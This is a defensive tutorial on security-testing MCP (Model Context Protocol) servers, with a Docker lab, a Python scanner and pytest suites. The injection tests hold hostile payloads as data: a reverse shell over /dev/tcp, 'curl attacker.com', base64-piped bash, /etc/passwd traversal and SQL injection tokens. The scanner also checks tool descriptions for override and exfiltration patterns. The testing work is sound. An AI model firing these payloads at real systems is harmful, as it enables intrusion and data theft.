MCP Security Testing: How to Test MCP Servers for Vulnerabilities
Advanced | 18 min read | Updated 2026-03-24
A defense-focused guide to security testing MCP server implementations -- methodology for MCP security assessments, scanning tools, common test cases for auth bypass, injection, traversal, and data leaks, with working test scripts and reporting templates.
Security testing of MCP servers requires a specialized methodology because MCP sits at the intersection of traditional application security (HTTP, authentication, input validation) and AI-specific risks (prompt injection, token amplification, tool description poisoning). Standard web application scanners miss MCP-specific vulnerabilities, and AI security tools typically focus on the LLM rather than the tool infrastructure.
MCP Security Assessment Methodology
Phase Overview
┌───────────────────────────────────────────────────────────────┐
│ MCP Security Assessment Phases                                │
├────────────┬──────────────────────────────────────────────────┤
│ Phase 1    │ Reconnaissance and Discovery                     │
│            │ - Identify all MCP servers in scope              │
│            │ - Enumerate tools, transports, and capabilities  │
│            │ - Map trust boundaries and data flows            │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 2    │ Authentication and Authorization Testing         │
│            │ - Test for unauthenticated access                │
│            │ - Test token/credential handling                 │
│            │ - Verify per-tool authorization scopes           │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 3    │ Input Validation Testing                         │
│            │ - Command injection in all parameters            │
│            │ - Path traversal in file operations              │
│            │ - SQL injection in database tools                │
│            │ - Tool description poisoning analysis            │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 4    │ Session and State Testing                        │
│            │ - Cross-session data isolation                   │
│            │ - Session fixation and hijacking                 │
│            │ - State cleanup on disconnect                    │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 5    │ Resource and Cost Testing                        │
│            │ - Token amplification (sampling abuse)           │
│            │ - Output size abuse                              │
│            │ - Rate limiting effectiveness                    │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 6    │ Supply Chain and Configuration Review            │
│            │ - Package integrity verification                 │
│            │ - SDK version validation                         │
│            │ - Network exposure assessment                    │
│            │ - Container/sandbox configuration review         │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 7    │ Reporting and Remediation                        │
│            │ - Findings documentation                         │
│            │ - Risk scoring and prioritization                │
│            │ - Remediation recommendations                    │
│            │ - Retest verification                            │
└────────────┴──────────────────────────────────────────────────┘
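The scanner presented later in this guide automates Phases 1 through 5 only, so the package integrity check from Phase 6 has to be done separately. The following is a minimal sketch of that check, assuming the expected SHA-256 digest of the server package was obtained from a trusted source (a lockfile or a signed release note). The function names `sha256_of` and `verify_artifact` and the demo file are hypothetical and exist only for this illustration.

```python
import hashlib
import hmac
import tempfile
from pathlib import Path


def sha256_of(path: Path, chunk_size: int = 65536) -> str:
    """Stream the file through SHA-256 so large packages are not loaded at once."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_artifact(path: Path, expected_sha256: str) -> bool:
    """Return True only if the file's digest matches the pinned digest."""
    return hmac.compare_digest(sha256_of(path), expected_sha256.strip().lower())


# Demo with a throwaway file standing in for a downloaded server package.
with tempfile.TemporaryDirectory() as tmp:
    artifact = Path(tmp) / "mcp-server-package.tgz"  # hypothetical file name
    artifact.write_bytes(b"original package contents")
    pinned = hashlib.sha256(b"original package contents").hexdigest()

    INTACT_OK = verify_artifact(artifact, pinned)

    # Simulate tampering after the digest was pinned.
    artifact.write_bytes(b"original package contents + backdoor")
    TAMPERED_OK = verify_artifact(artifact, pinned)

print(f"intact: {INTACT_OK}, tampered: {TAMPERED_OK}")
```

A mismatch would be recorded as a supply chain finding and should stop the assessment of that build until the source of the difference is understood.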
Setting Up a Safe Testing Environment
Docker-Based Test Lab
# docker-compose.test.yaml
# Isolated test environment for MCP security testing
version: "3.8"

services:
  # Target MCP server (the server being tested)
  target-mcp-server:
    build:
      context: ./target-server
    container_name: mcp-test-target
    ports:
      # Bind to loopback only so the test target is not reachable from the LAN
      - "127.0.0.1:8080:8080"
    environment:
      - MCP_AUTH_ENABLED=true
      - MCP_AUTH_TOKEN=test-token-for-testing-only
      - MCP_WORKSPACE=/workspace
    volumes:
      - test-workspace:/workspace
    networks:
      - test-network

  # MCP security scanner
  mcp-scanner:
    build:
      context: ./scanner
      dockerfile: Dockerfile.scanner
    container_name: mcp-scanner
    environment:
      - TARGET_URL=http://target-mcp-server:8080
      - TEST_TOKEN=test-token-for-testing-only
    volumes:
      - ./reports:/reports
    networks:
      - test-network
    depends_on:
      - target-mcp-server

  # Network traffic capture
  tcpdump:
    image: nicolaka/netshoot
    container_name: mcp-traffic-capture
    command: tcpdump -i any -w /captures/mcp-traffic.pcap port 8080
    volumes:
      - ./captures:/captures
    networks:
      - test-network
    cap_add:
      - NET_RAW
      - NET_ADMIN

volumes:
  test-workspace:

networks:
  test-network:
    driver: bridge
#!/bin/bash
# setup-test-lab.sh -- Set up the MCP security testing environment
set -euo pipefail

echo "[*] Creating test workspace with sample files..."
mkdir -p target-server/workspace
echo "public content" > target-server/workspace/public.txt
# Fake secret used as a canary for traversal and data-leak tests
echo "SECRET_API_KEY=sk-test-12345" > target-server/workspace/.env
mkdir -p target-server/workspace/subdir
echo "nested file" > target-server/workspace/subdir/nested.txt

echo "[*] Creating reports directory..."
mkdir -p reports captures

echo "[*] Starting test environment..."
docker compose -f docker-compose.test.yaml up -d

echo "[*] Waiting for services..."
sleep 5

echo "[*] Verifying test environment..."
# -f makes curl return non-zero on HTTP errors, so an unhealthy server is reported
if curl -sf http://localhost:8080/health; then
  echo " -- MCP server healthy"
else
  echo "[!] MCP server did not respond on /health" >&2
  exit 1
fi

echo "[+] Test environment ready."
echo " Target: http://localhost:8080"
echo " Reports: ./reports/"
echo " Captures: ./captures/"
MCP Security Scanner
"""
MCP Security Scanner
Comprehensive security testing tool for MCP server implementations.
"""
import asyncio
import aiohttp
import json
import logging
from dataclasses import dataclass, field
from typing import Optional
from datetime import datetime
from enum import Enum

logging.basicConfig(level=logging.INFO)
logger = logging.getLogger("mcp.scanner")


class Severity(Enum):
    CRITICAL = "critical"
    HIGH = "high"
    MEDIUM = "medium"
    LOW = "low"
    INFO = "info"


@dataclass
class Finding:
    """A security finding from the scan."""
    title: str
    severity: Severity
    category: str
    description: str
    evidence: str = ""
    remediation: str = ""
    references: list[str] = field(default_factory=list)
    cvss_score: float = 0.0


@dataclass
class ScanResult:
    """Complete scan results."""
    target_url: str
    scan_start: datetime
    scan_end: Optional[datetime] = None
    findings: list[Finding] = field(default_factory=list)
    tools_discovered: list[dict] = field(default_factory=list)
    server_info: dict = field(default_factory=dict)


class MCPSecurityScanner:
    """
    Security scanner for MCP servers.
    Tests for common vulnerabilities identified in MCP security research.
    """

    def __init__(self, target_url: str, auth_token: Optional[str] = None):
        self.target_url = target_url.rstrip("/")
        self.auth_token = auth_token
        self.result = ScanResult(
            target_url=target_url,
            scan_start=datetime.utcnow(),
        )

    def _headers(self) -> dict:
        """Build request headers, adding the bearer token when one is configured."""
        headers = {"Content-Type": "application/json"}
        if self.auth_token:
            headers["Authorization"] = f"Bearer {self.auth_token}"
        return headers

    async def _jsonrpc_call(self, session: aiohttp.ClientSession,
                            method: str, params: Optional[dict] = None,
                            msg_id: int = 1) -> dict:
        """Send a JSON-RPC request to the MCP server."""
        payload = {
            "jsonrpc": "2.0",
            "method": method,
            "id": msg_id,
        }
        if params:
            payload["params"] = params
        async with session.post(
            f"{self.target_url}/messages/",
            json=payload,
            headers=self._headers(),
        ) as resp:
            return await resp.json()

    async def run_full_scan(self):
        """Run all automated security testing phases (1 through 5)."""
        async with aiohttp.ClientSession() as session:
            logger.info("Starting MCP security scan: %s", self.target_url)
            await self.phase1_discovery(session)
            await self.phase2_authentication(session)
            await self.phase3_input_validation(session)
            await self.phase4_session_isolation(session)
            await self.phase5_resource_abuse(session)
        self.result.scan_end = datetime.utcnow()
        logger.info(
            "Scan complete. Findings: %d (Critical: %d, High: %d)",
            len(self.result.findings),
            sum(1 for f in self.result.findings if f.severity == Severity.CRITICAL),
            sum(1 for f in self.result.findings if f.severity == Severity.HIGH),
        )
        return self.result

    # === Phase 1: Discovery ===
    async def phase1_discovery(self, session: aiohttp.ClientSession):
        """Enumerate MCP server capabilities and tools."""
        logger.info("Phase 1: Discovery")

        # Try to initialize
        try:
            init_result = await self._jsonrpc_call(session, "initialize", {
                "protocolVersion": "2024-11-05",
                "clientInfo": {"name": "security-scanner", "version": "1.0"},
                "capabilities": {},
            })
            self.result.server_info = init_result.get("result", {})
            logger.info("Server info: %s", self.result.server_info.get("serverInfo", {}))
        except Exception as e:
            logger.warning("Initialize failed: %s", e)

        # List tools
        try:
            tools_result = await self._jsonrpc_call(session, "tools/list")
            tools = tools_result.get("result", {}).get("tools", [])
            self.result.tools_discovered = tools
            logger.info("Discovered %d tools", len(tools))
            # Analyze tool descriptions for injection patterns
            for tool in tools:
                self._analyze_tool_description(tool)
        except Exception as e:
            logger.warning("Tool enumeration failed: %s", e)

    def _analyze_tool_description(self, tool: dict):
        """Check a tool description for injection patterns (heuristic; expect false positives)."""
        import re

        desc = tool.get("description", "")
        name = tool.get("name", "unknown")
        suspicious_patterns = [
            (r"(?i)\byou must\b", "Imperative instruction in tool description"),
            (r"(?i)\balways\b.*\btool\b", "Unconditional tool directive"),
            (r"https?://", "External URL in tool description"),
            (r"(?i)\bignore\b.*\bprevious\b", "Prompt override pattern"),
            (r"(?i)\bsend\b.*\bto\b.*https?://", "Data exfiltration instruction"),
        ]
        for pattern, desc_text in suspicious_patterns:
            if re.search(pattern, desc):
                self.result.findings.append(Finding(
                    title=f"Suspicious tool description: {name}",
                    severity=Severity.HIGH,
                    category="tool_description_poisoning",
                    description=desc_text,
                    evidence=f"Tool '{name}' description: {desc[:300]}",
                    remediation="Review and sanitize tool descriptions. Remove imperative instructions and external URLs.",
                    references=["OWASP ASI-03"],
                ))

    # === Phase 2: Authentication ===
    async def phase2_authentication(self, session: aiohttp.ClientSession):
        """Test authentication controls."""
        logger.info("Phase 2: Authentication")

        # Test unauthenticated access
        unauth_headers = {"Content-Type": "application/json"}
        try:
            async with session.post(
                f"{self.target_url}/messages/",
                json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
                headers=unauth_headers,
            ) as resp:
                if resp.status == 200:
                    body = await resp.json()
                    if "result" in body:
                        self.result.findings.append(Finding(
                            title="Unauthenticated access to MCP server",
                            severity=Severity.CRITICAL,
                            category="authentication",
                            description=(
                                "MCP server accepts tool listing without authentication. "
                                "Any network-reachable client can enumerate and call tools."
                            ),
                            evidence="HTTP 200 response to unauthenticated tools/list",
                            remediation="Implement Bearer token or mTLS authentication.",
                            references=["VulnerableMCP", "MCP Auth Gaps"],
                            cvss_score=9.1,
                        ))
                elif resp.status in (401, 403):
                    logger.info("Authentication required (good): HTTP %d", resp.status)
        except Exception as e:
            logger.warning("Auth test failed: %s", e)

        # Test with an invalid token
        bad_headers = {
            "Content-Type": "application/json",
            "Authorization": "Bearer invalid-token-12345",
        }
        try:
            async with session.post(
                f"{self.target_url}/messages/",
                json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
                headers=bad_headers,
            ) as resp:
                if resp.status == 200:
                    self.result.findings.append(Finding(
                        title="Authentication bypass with invalid token",
                        severity=Severity.CRITICAL,
                        category="authentication",
                        description="Server accepts an invalid authentication token.",
                        evidence="HTTP 200 with token 'invalid-token-12345'",
                        remediation="Verify token validation logic.",
                        cvss_score=9.8,
                    ))
        except Exception as e:
            logger.warning("Invalid token test failed: %s", e)

    # === Phase 3: Input Validation ===
    async def phase3_input_validation(self, session: aiohttp.ClientSession):
        """Test input validation across all tools."""
        logger.info("Phase 3: Input Validation")
        for tool in self.result.tools_discovered:
            tool_name = tool.get("name", "")
            schema = tool.get("inputSchema", {})
            properties = schema.get("properties", {})
            for param_name, param_schema in properties.items():
                param_type = param_schema.get("type", "string")
                if param_type == "string":
                    # Test command injection
                    await self._test_command_injection(
                        session, tool_name, param_name
                    )
                    # Test path traversal (if the parameter name suggests a file path)
                    if any(s in param_name.lower() for s in ["path", "file", "dir", "folder"]):
                        await self._test_path_traversal(
                            session, tool_name, param_name
                        )

    async def _test_command_injection(self, session: aiohttp.ClientSession,
                                      tool_name: str, param_name: str):
        """Test a parameter for command injection."""
        payloads = [
            ("basic_semicolon", "test; id"),
            ("pipe", "test | cat /etc/passwd"),
            ("backtick", "test `id`"),
            ("dollar_paren", "test $(whoami)"),
            ("newline", "test\nid"),
            ("and_chain", "test && curl attacker.com"),
        ]
        for payload_name, payload in payloads:
            try:
                result = await self._jsonrpc_call(session, "tools/call", {
                    "name": tool_name,
                    "arguments": {param_name: payload},
                })
                # Check whether the response contains output that indicates execution
                result_text = json.dumps(result)
                injection_indicators = ["uid=", "root:", "www-data", "nobody"]
                for indicator in injection_indicators:
                    if indicator in result_text:
                        self.result.findings.append(Finding(
                            title=f"Command injection in {tool_name}.{param_name}",
                            severity=Severity.CRITICAL,
                            category="command_injection",
                            description=(
                                f"Parameter '{param_name}' of tool '{tool_name}' "
                                f"is vulnerable to command injection via {payload_name}."
                            ),
                            evidence=f"Payload: {payload}\nResponse: {result_text[:500]}",
                            remediation=(
                                "Use parameterized command execution (shell=False). "
                                "Validate input against allowlist patterns."
                            ),
                            references=["CVE-2025-6514", "OWASP Command Injection"],
                            cvss_score=9.6,
                        ))
                        # One finding per payload is enough
                        break
            except Exception:
                # Transport or decoding errors are not evidence of injection
                continue

    async def _test_path_traversal(self, session: aiohttp.ClientSession,
                                   tool_name: str, param_name: str):
        """Test a parameter for path traversal."""
        payloads = [
            ("dot_dot_slash", "../../../etc/passwd"),
            ("absolute", "/etc/passwd"),
            ("encoded", "..%2f..%2f..%2fetc%2fpasswd"),
            ("double_encoded", "..%252f..%252f..%252fetc%252fpasswd"),
            ("null_byte", "valid.txt\x00../../../etc/passwd"),
        ]
        for payload_name, payload in payloads:
            try:
                result = await self._jsonrpc_call(session, "tools/call", {
                    "name": tool_name,
                    "arguments": {param_name: payload},
                })
                result_text = json.dumps(result)
                # Typical /etc/passwd entries on Linux and BSD/macOS
                passwd_indicators = ["root:x:", "root:*:", "daemon:", "nobody:"]
                for indicator in passwd_indicators:
                    if indicator in result_text:
                        self.result.findings.append(Finding(
                            title=f"Path traversal in {tool_name}.{param_name}",
                            severity=Severity.CRITICAL,
                            category="path_traversal",
                            description=(
                                f"Parameter '{param_name}' of tool '{tool_name}' "
                                f"is vulnerable to path traversal via {payload_name}."
                            ),
                            evidence=f"Payload: {payload}\nResponse contains: {indicator}",
                            remediation=(
                                "Resolve and canonicalize paths before access. "
                                "Verify resolved path is within allowed base directory."
                            ),
                            references=["CVE-2025-68145", "CWE-22"],
                            cvss_score=8.6,
                        ))
                        # One finding per payload is enough
                        break
            except Exception:
                continue

    # === Phase 4: Session Isolation ===
    async def phase4_session_isolation(self, session: aiohttp.ClientSession):
        """Identify candidate tools for cross-session data isolation testing."""
        logger.info("Phase 4: Session Isolation")
        # Find a tool pair that stores and retrieves data
        write_tools = [t for t in self.result.tools_discovered
                       if any(s in t.get("name", "").lower()
                              for s in ["save", "write", "remember", "store", "set"])]
        read_tools = [t for t in self.result.tools_discovered
                      if any(s in t.get("name", "").lower()
                             for s in ["read", "recall", "get", "retrieve", "load"])]
        if not write_tools or not read_tools:
            logger.info("No write/read tool pair found for isolation test")
            return
        logger.info("Candidate pair for session isolation test: %s / %s",
                    write_tools[0]["name"], read_tools[0]["name"])
        # Note: a full isolation test requires two separate SSE connections,
        # which this scanner does not establish. The pair logged above must be
        # tested from two independent client sessions.

    # === Phase 5: Resource Abuse ===
    async def phase5_resource_abuse(self, session: aiohttp.ClientSession):
        """Test resource limits and rate limiting."""
        logger.info("Phase 5: Resource Abuse")

        # Test rate limiting
        burst_count = 0
        for i in range(50):
            try:
                async with session.post(
                    f"{self.target_url}/messages/",
                    json={"jsonrpc": "2.0", "method": "tools/list", "id": i},
                    headers=self._headers(),
                ) as resp:
                    if resp.status == 429:
                        logger.info("Rate limited at request %d (good)", i)
                        break
                    burst_count += 1
            except Exception:
                break
        if burst_count >= 50:
            self.result.findings.append(Finding(
                title="No rate limiting on MCP tool calls",
                severity=Severity.HIGH,
                category="rate_limiting",
                description=(
                    f"Server accepted {burst_count} rapid requests without rate limiting. "
                    f"This enables denial-of-wallet and brute force attacks."
                ),
                evidence=f"Sent {burst_count} requests in a burst, none returned HTTP 429",
                remediation="Implement rate limiting per client IP and per session.",
                references=["MCP Denial of Wallet"],
            ))

        # Test output size limits
        for tool in self.result.tools_discovered:
            if "query" in tool.get("name", "").lower():
                try:
                    # Assumes the tool takes a "query" argument and that a large table exists
                    result = await self._jsonrpc_call(session, "tools/call", {
                        "name": tool["name"],
                        "arguments": {"query": "SELECT * FROM large_table LIMIT 1000000"},
                    })
                    result_size = len(json.dumps(result))
                    if result_size > 1_000_000:
                        self.result.findings.append(Finding(
                            title=f"No output size limit on {tool['name']}",
                            severity=Severity.MEDIUM,
                            category="resource_abuse",
                            description=f"Tool returned {result_size} bytes without truncation.",
                            remediation="Implement output size limits on all tools.",
                        ))
                except Exception:
                    continue

    def generate_report(self, format: str = "json") -> str:
        """Generate the security assessment report."""
        if format == "json":
            return json.dumps({
                "target": self.result.target_url,
                "scan_start": self.result.scan_start.isoformat(),
                "scan_end": self.result.scan_end.isoformat() if self.result.scan_end else None,
                "summary": {
                    "total_findings": len(self.result.findings),
                    "critical": sum(1 for f in self.result.findings if f.severity == Severity.CRITICAL),
                    "high": sum(1 for f in self.result.findings if f.severity == Severity.HIGH),
                    "medium": sum(1 for f in self.result.findings if f.severity == Severity.MEDIUM),
                    "low": sum(1 for f in self.result.findings if f.severity == Severity.LOW),
                    "tools_discovered": len(self.result.tools_discovered),
                },
                "server_info": self.result.server_info,
                "findings": [
                    {
                        "title": f.title,
                        "severity": f.severity.value,
                        "category": f.category,
                        "description": f.description,
                        "evidence": f.evidence,
                        "remediation": f.remediation,
                        "references": f.references,
                        "cvss_score": f.cvss_score,
                    }
                    # Highest CVSS score first
                    for f in sorted(self.result.findings,
                                    key=lambda x: x.cvss_score, reverse=True)
                ],
            }, indent=2)
        # Fail loudly instead of silently writing an empty report
        raise ValueError(f"Unsupported report format: {format}")


# CLI runner
async def main():
    import argparse
    from pathlib import Path

    parser = argparse.ArgumentParser(description="MCP Security Scanner")
    parser.add_argument("target", help="MCP server URL")
    parser.add_argument("--token", help="Authentication token")
    parser.add_argument("--output", default="reports/mcp-scan.json", help="Output file")
    args = parser.parse_args()

    scanner = MCPSecurityScanner(args.target, auth_token=args.token)
    await scanner.run_full_scan()
    report = scanner.generate_report()

    # Create the report directory if it does not exist yet
    Path(args.output).parent.mkdir(parents=True, exist_ok=True)
    with open(args.output, "w") as f:
        f.write(report)
    print(f"\nReport written to: {args.output}")
    print(f"Findings: {len(scanner.result.findings)}")


if __name__ == "__main__":
    asyncio.run(main())
Individual Test Scripts
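Cross-session isolation (Phase 4) is the one check the scanner only prepares for, because it needs two independent client sessions. The sketch below shows the core of such a test in a transport-agnostic way: a unique canary is written through session A and then looked for in what session B can read. It assumes each session is wrapped in an async callable that sends one `tools/call` request. The names `leaks_across_sessions`, `make_fake_server`, the tool names `save` and `load`, and the `key`/`value` argument names are all hypothetical, and the in-memory fake server exists only to exercise the check.

```python
import asyncio
import json
import uuid
from typing import Awaitable, Callable

# A caller sends one tools/call request over a single MCP session and returns
# the decoded JSON-RPC response. How the session is opened is left to the harness.
ToolCaller = Callable[[str, dict], Awaitable[dict]]


async def leaks_across_sessions(call_a: ToolCaller, call_b: ToolCaller,
                                write_tool: str, read_tool: str) -> bool:
    """Return True if data written in session A is readable from session B."""
    canary = f"canary-{uuid.uuid4().hex}"
    # Argument names are assumptions; adapt them to the tool's inputSchema.
    await call_a(write_tool, {"key": "isolation-test", "value": canary})
    response = await call_b(read_tool, {"key": "isolation-test"})
    return canary in json.dumps(response)


def make_fake_server(shared: bool) -> Callable[[str], ToolCaller]:
    """In-memory stand-in for an MCP server, used only to demonstrate the check."""
    stores: dict = {}

    def open_session(session_id: str) -> ToolCaller:
        # A vulnerable server keeps one global store; a correct one keys by session.
        store = stores.setdefault("global" if shared else session_id, {})

        async def call(tool: str, arguments: dict) -> dict:
            if tool == "save":
                store[arguments["key"]] = arguments["value"]
                return {"result": {"content": []}}
            text = store.get(arguments["key"], "")
            return {"result": {"content": [{"type": "text", "text": text}]}}

        return call

    return open_session


vulnerable = make_fake_server(shared=True)
isolated = make_fake_server(shared=False)

LEAK_ON_SHARED = asyncio.run(
    leaks_across_sessions(vulnerable("a"), vulnerable("b"), "save", "load"))
LEAK_ON_ISOLATED = asyncio.run(
    leaks_across_sessions(isolated("a"), isolated("b"), "save", "load"))
print(f"shared store leaks: {LEAK_ON_SHARED}, per-session store leaks: {LEAK_ON_ISOLATED}")
```

Against a real target, the two callers would wrap two separately established connections, ideally authenticated as different users, and a `True` result would be reported as a session isolation finding.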
Authentication Bypass Tests
"""
mcp_test_auth.py -- Authentication bypass test cases for MCP servers.
Requires pytest and pytest-asyncio.
"""
import os

import aiohttp
import pytest

# The runner script passes the target through the TARGET environment variable
TARGET = os.environ.get("TARGET", "http://localhost:8080")
TOOLS_LIST = {"jsonrpc": "2.0", "method": "tools/list", "id": 1}


async def tools_list_status(extra_headers: dict) -> int:
    """POST tools/list with the given extra headers and return the HTTP status."""
    headers = {"Content-Type": "application/json", **extra_headers}
    async with aiohttp.ClientSession() as session:
        async with session.post(
            f"{TARGET}/messages/", json=TOOLS_LIST, headers=headers
        ) as resp:
            return resp.status


class TestMCPAuthentication:
    """Test authentication controls on MCP servers."""

    @pytest.mark.asyncio
    async def test_no_token_rejected(self):
        """Request without a token must be rejected."""
        status = await tools_list_status({})
        assert status in (401, 403), \
            f"Unauthenticated request accepted (HTTP {status})"

    @pytest.mark.asyncio
    async def test_invalid_token_rejected(self):
        """Request with an invalid token must be rejected."""
        status = await tools_list_status({"Authorization": "Bearer invalid-token"})
        assert status in (401, 403), \
            f"Invalid token accepted (HTTP {status})"

    @pytest.mark.asyncio
    async def test_expired_token_rejected(self):
        """Request with an expired token must be rejected."""
        # Placeholder: replace with a token the target actually issued and
        # that has since expired, otherwise this duplicates the invalid-token test.
        status = await tools_list_status(
            {"Authorization": "Bearer expired-test-token-2025"}
        )
        assert status in (401, 403), \
            f"Expired token accepted (HTTP {status})"

    @pytest.mark.asyncio
    async def test_empty_bearer_rejected(self):
        """Empty bearer token must be rejected."""
        status = await tools_list_status({"Authorization": "Bearer "})
        assert status in (401, 403), \
            f"Empty bearer token accepted (HTTP {status})"

    @pytest.mark.asyncio
    async def test_sql_injection_in_token(self):
        """SQL injection in the token field must be rejected safely."""
        injection_tokens = [
            "' OR '1'='1",
            "admin'--",
            "\" OR \"1\"=\"1",
            "1; DROP TABLE tokens;",
        ]
        for token in injection_tokens:
            status = await tools_list_status({"Authorization": f"Bearer {token}"})
            assert status in (401, 403), \
                f"SQL injection token accepted: {token}"
Command Injection Tests
"""
mcp_test_injection.py -- Command injection test cases.
Requires pytest and pytest-asyncio.
"""
import json
import os

import aiohttp
import pytest
import pytest_asyncio

INJECTION_PAYLOADS = {
    "semicolon": "test; id",
    "pipe_to_shell": "test | bash",
    "backtick": "`id`",
    "dollar_paren": "$(whoami)",
    "dollar_brace": "${IFS}cat${IFS}/etc/passwd",
    "newline": "test\nid",
    "carriage_return": "test\r\nid",
    "ampersand": "test && id",
    "or_chain": "test || id",
    "subshell": "(id)",
    "redirect": "test > /tmp/pwned",
    "reverse_shell": "test; bash -i >& /dev/tcp/127.0.0.1/4444 0>&1",
    "python_exec": "test; python3 -c 'import os;os.system(\"id\")'",
    "null_byte": "test\x00; id",
    "base64_decode": "test; echo aWQ= | base64 -d | bash",
}


class TestCommandInjection:
    """Test all string tool parameters for command injection."""
    # The runner script passes these through environment variables
    TARGET = os.environ.get("TARGET", "http://localhost:8080")
    TOKEN = os.environ.get("TOKEN", "test-token-for-testing-only")

    def _headers(self) -> dict:
        return {
            "Content-Type": "application/json",
            "Authorization": f"Bearer {self.TOKEN}",
        }

    # pytest-asyncio's strict mode requires its own decorator for async fixtures
    @pytest_asyncio.fixture
    async def session(self):
        async with aiohttp.ClientSession() as s:
            yield s

    @pytest_asyncio.fixture
    async def tools(self, session):
        """Discover available tools."""
        async with session.post(
            f"{self.TARGET}/messages/",
            json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
            headers=self._headers(),
        ) as resp:
            data = await resp.json()
            return data.get("result", {}).get("tools", [])

    @pytest.mark.asyncio
    @pytest.mark.parametrize("payload_name,payload", list(INJECTION_PAYLOADS.items()))
    async def test_injection_blocked(self, session, tools, payload_name, payload):
        """Verify injection payloads are blocked for all string parameters."""
        for tool in tools:
            tool_name = tool["name"]
            properties = tool.get("inputSchema", {}).get("properties", {})
            for param_name, param_schema in properties.items():
                # Only string parameters can carry these payloads
                if param_schema.get("type", "string") != "string":
                    continue
                async with session.post(
                    f"{self.TARGET}/messages/",
                    json={
                        "jsonrpc": "2.0",
                        "method": "tools/call",
                        "id": 1,
                        "params": {
                            "name": tool_name,
                            "arguments": {param_name: payload},
                        },
                    },
                    headers=self._headers(),
                ) as resp:
                    data = await resp.json()
                    result_text = json.dumps(data).lower()
                    # These strings indicate successful command execution
                    dangerous_outputs = [
                        "uid=", "root:", "www-data", "nobody:",
                        "/bin/bash", "/bin/sh", "permission denied",
                    ]
                    for indicator in dangerous_outputs:
                        assert indicator not in result_text, (
                            f"COMMAND INJECTION: {tool_name}.{param_name} "
                            f"with payload '{payload_name}' produced output "
                            f"containing '{indicator}'"
                        )
Running the Tests
#!/bin/bash
# run-mcp-security-tests.sh -- Execute all MCP security tests
set -euo pipefail

TARGET="${1:-http://localhost:8080}"
TOKEN="${2:-test-token-for-testing-only}"
REPORT_DIR="./reports/$(date +%Y%m%d_%H%M%S)"
mkdir -p "$REPORT_DIR"

echo "=== MCP Security Test Suite ==="
echo "Target: $TARGET"
echo "Report: $REPORT_DIR"
echo ""

# Run Python scanner
echo "[*] Running MCP Security Scanner..."
python3 mcp_scanner.py "$TARGET" \
  --token "$TOKEN" \
  --output "$REPORT_DIR/scanner-report.json"

# Run pytest test suites.
# pytest exits non-zero when a test fails; with "set -e" and "pipefail" that
# would abort the script before the summary, so failures are reported instead.
echo ""
echo "[*] Running Authentication Tests..."
TARGET="$TARGET" TOKEN="$TOKEN" \
  pytest mcp_test_auth.py -v --tb=short \
  --junitxml="$REPORT_DIR/auth-tests.xml" 2>&1 | tee "$REPORT_DIR/auth-tests.log" \
  || echo "[!] Authentication tests reported failures"

echo ""
echo "[*] Running Injection Tests..."
TARGET="$TARGET" TOKEN="$TOKEN" \
  pytest mcp_test_injection.py -v --tb=short \
  --junitxml="$REPORT_DIR/injection-tests.xml" 2>&1 | tee "$REPORT_DIR/injection-tests.log" \
  || echo "[!] Injection tests reported failures"

echo ""
echo "[*] Generating summary report..."
# Unquoted heredoc: $REPORT_DIR and $TARGET are expanded by the shell
python3 << PYEOF
import json, os

report_dir = "$REPORT_DIR"
findings = []

# Collect scanner findings
scanner_report = os.path.join(report_dir, "scanner-report.json")
if os.path.exists(scanner_report):
    with open(scanner_report) as f:
        data = json.load(f)
    findings.extend(data.get("findings", []))

print(f"\n{'='*60}")
print(f" MCP Security Assessment Summary")
print(f"{'='*60}")
print(f" Target: $TARGET")
print(f" Total findings: {len(findings)}")
for severity in ["critical", "high", "medium", "low"]:
    count = sum(1 for f in findings if f.get("severity") == severity)
    if count > 0:
        print(f" {severity.upper()}: {count}")
if findings:
    print(f"\n Top findings:")
    for f in sorted(findings, key=lambda x: x.get("cvss_score", 0), reverse=True)[:5]:
        print(f" [{f['severity'].upper()}] {f['title']}")
print(f"\n Full report: {report_dir}/")
print(f"{'='*60}")
PYEOF
Reporting Template
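Each finding in the report carries both a severity label and a CVSS score, and the two are easier to keep consistent when the label is derived from the score. The following is a minimal sketch, assuming the CVSS v3.1 qualitative severity rating scale. The function name `severity_from_cvss` is hypothetical, and mapping a score of 0.0 (CVSS rating "None") to the report's INFO level is an assumption made for this illustration.

```python
def severity_from_cvss(score: float) -> str:
    """Map a CVSS v3.1 base score to the severity labels used in the report."""
    if not 0.0 <= score <= 10.0:
        raise ValueError(f"CVSS score out of range: {score}")
    if score == 0.0:
        return "INFO"      # CVSS v3.1 calls this band "None" (assumed mapping)
    if score < 4.0:
        return "LOW"       # 0.1 - 3.9
    if score < 7.0:
        return "MEDIUM"    # 4.0 - 6.9
    if score < 9.0:
        return "HIGH"      # 7.0 - 8.9
    return "CRITICAL"      # 9.0 - 10.0


# Scores taken from the scanner findings earlier in this guide
LABELS = {score: severity_from_cvss(score) for score in (9.8, 9.6, 9.1, 8.6, 0.0)}
for score, label in LABELS.items():
    print(f"{score:>4} -> {label}")
```

Findings the scanner leaves at the default score of 0.0 would come out as INFO under this mapping, which is a signal that they still need to be scored by hand before the report is issued.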
{
  "report_metadata": {
    "title": "MCP Server Security Assessment Report",
    "version": "1.0",
    "date": "2026-03-24",
    "assessor": "Security Team",
    "classification": "CONFIDENTIAL"
  },
  "executive_summary": {
    "scope": "Security assessment of [MCP Server Name] version [X.Y.Z]",
    "methodology": "Based on VulnerableMCP project methodology and OWASP ASI guidelines",
    "overall_risk": "HIGH|MEDIUM|LOW",
    "key_findings": [
      "Finding summary 1",
      "Finding summary 2"
    ],
    "recommendation": "Address all CRITICAL and HIGH findings before production deployment"
  },
  "scope": {
    "target_server": "Server name and version",
    "transport_type": "HTTP+SSE | stdio",
    "tools_tested": ["tool1", "tool2"],
    "test_environment": "Docker-based isolated lab",
    "exclusions": ["Any areas not tested"]
  },
  "findings": [
    {
      "id": "MCP-FINDING-001",
      "title": "Finding title",
      "severity": "CRITICAL|HIGH|MEDIUM|LOW|INFO",
      "cvss_score": 9.6,
